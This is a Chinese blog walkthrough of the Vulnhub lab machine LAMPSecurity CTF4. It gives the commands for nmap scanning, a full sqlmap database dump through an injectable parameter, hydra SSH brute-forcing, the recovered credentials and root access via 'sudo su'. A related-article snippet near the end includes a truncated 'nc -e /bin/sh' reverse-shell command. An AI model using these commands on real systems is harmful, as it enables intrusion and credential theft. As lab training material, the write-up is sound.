vulnhub之ctf4

最新推荐文章于 2024-03-08 16:58:29 发布
最新推荐文章于 2024-03-08 16:58:29 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 靶练习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/127516403
版权

vulnhub之ctf4
难度:so easy
下载地址
主机发现
netdiscover或者nmap -sP 192.168.2.0/24
在这里插入图片描述
在这里插入图片描述

nmap -p- -T4 -A 192.168.2.4

初步进行检测,并且进行端口扫描,发现开放22端口,80端口等
在这里插入图片描述

对80开放的web服务进行检测,这里使用rad加xray配合检测,友情提示,rad需要谷歌浏览器且不能够在root权限下运行
在这里插入图片描述
检测发现存在sql注入,这里使用sqlmap下载数据库中的数据,别问为什么下载,一个字,快

sqlmap -u 'http://192.168.2.4/index.html?page=blog&title=Blog&id=2' --dbs  --batch --dump

在user数据表中发现用户名以及密码,编辑为字典,
在这里插入图片描述在这里插入图片描述使用hydra进行爆破

hydra -L uer.txt -P passwd.txt ssh 192.168.2.6 -vV

存在两个用户,

dstevens   password: ilike2surf
achen   password: seventysixers

使用ssh登录时候,可能会产生一定的错误,这里给出解决方法

http://liyangweb.com/service/500.html

使用dstevens登录时,sudo su时候,输入该用户对应的密码即可成功变成root用户
在这里插入图片描述使用achen用户名登录时,直接sudo su即可到root权限

在这里插入图片描述

天下是个小趴菜
关注
专栏目录
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
vulnhub靶场渗透学习-JIS-CTF
博闻强记,慎思笃行
04-17 3923
实验环境 攻击机:KALI 目标机:JIS-CTF 使用Vmware虚拟机中NAT网络 网段为192.168.1.0/24 解题过程 基本信息探测 netdiscover -r 192.168.1.0.24 可以看到靶机地址是192.168.1.132 nmap -A 192.168.1.132 可以看到靶机开放了两个端口 22 和80 对...
VunlnHubCTF4
qq_45434762的博客
05-21 492
主机发现使用nmap扫描网段,寻找靶机IP地址sudo nmap 192.168.169.1/24 靶机的IP是192.168.169.143端口探测使用nmap进一步探测目标主机开放的...
Vulnhub_CTF-4
weixin_44193247的博客
12-02 1157
Vulnhub_CTF-4
打靶记录(二):vulnhub——LampSecurity:CTF4
最新发布
pixelpoints的博客
03-08 1260
到包含这一步卡住了,尝试了ssh密钥泄露和直接读取shadow文件,发现权限不够,遂求助于文档,得知在当前目录/restriced路径下存在.htpasswd文件,记录了账号密码。htpasswd是apache的一个组件,主要功能是http验证,但其实.htpasswd并不存在默认路径,这个restriced路径大概率是自己定义的。因为ssh版本过于老旧,putty已经不支持SSH-1密钥的生成了,想生成密钥需要另寻他处,太麻烦而且原理已经差不多搞清楚了,遂放弃。又报错了,这次是key-type的问题。
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3183
Vulnhub-CTF4靶机实战
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
信息安全_.第六期.CTF.Web之Vulnhub靶场.课件资料.pptx
08-14
【网络安全实践:Vulnhub靶场与CTF竞赛解析】 Vulnhub是一个深受安全爱好者欢迎的在线学习平台,专注于提供丰富的渗透测试环境。它包含各种预设漏洞的虚拟机镜像,让学习者能够进行实战演练,提升网络安全技能。在...
vulnhub靶机ctf7笔记
Aillikew的博客
11-14 67
最后提权的时候,搜索含有pass字符串的文件也是很有经验的操作,而这步操作正是基于/etc/passwd文件中的多用户bash的情况,很有可能有用户为了方便提权操作,会在自己的目录下存放有关提权的密码文件,我们正是利用了这一点。又经过一系列的搜索,没发现特殊的信息,结合/etc/passwd中有Bash的用户有很多,很有可能其中的某个用户会在自己家目录中的文件里写入有关root的密码。/home/*: 搜索的目录路径,/home/表示在/home/目录下搜索,*表示搜索所有子目录和文件。
Vulnhub靶场第四关
L1928的博客
08-28 345
Vulnhub靶场 acid 目标: 获得root权限和flag 运行环境: 靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动获取IP。 攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。 1.使用nmap扫描VMware Network Adapter VMnet8 网段 2.获得ip进入主页 3.并且发现端口:Tcp 33447 4.底层服务:Apache2.
ctf php168,CTF靶场系列-LAMPSecurity: CTF4
weixin_39805409的博客
04-01 241
下载地址https://download.vulnhub.com/lampsecurity/ctf4.zip实战演练使用netdiscover命令查找靶机的IP。使用nmap查看靶机开放的端口打开浏览器使用avws进行扫描目录遍历漏洞注入POST /admin/index.php HTTP/1.1Content-Length: 149Content-Type: application/x-www-...
CTF之LAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 947
  练习环境     攻击机:kali     靶机:LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 480
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub
Bossfrank的博客
06-19 1770
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
【学渗透靶机——lampSecurityCTF4
jieli0901227的博客
05-13 310
page=blog&title=Blog&id=2 地址存在注入。发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码。2、使用 order by 判断数据库的列。5、查询user 表的字段信息。4、查询当前数据库有哪些表。3、使用联合注入找报错点。nmap 主机漏洞探测。扫描出也没什么有用信息。1、通过浏览页面发现。
LampSecurity-CTF4 靶场记录
m0_52729465的博客
08-15 190
1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。
LAMPSecurity——CTF4
qq_51175992的博客
10-11 204
这个靶场总体来说比较简单(比上周做的DC系列更简单),正常的nmap进行端口信息收集,然后在Web页面发现SQL注入漏洞,借助sqlmap顺利拿到用户和其密码信息。但是在SSH爆破时因为靶场时间太久了,密钥交换的算法不一致导致被一直无法正常爆破,后来通过大佬的指点通过设置密钥算法的参数完成登录。最后的提权部分就是/bin/bash提权就行。
VulnHub————CTF4
m0_63200360的博客
09-24 200
本人为新手,发文章只是记录学习笔记,大佬勿喷。文中很多地方有多种解法,并不唯一。
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值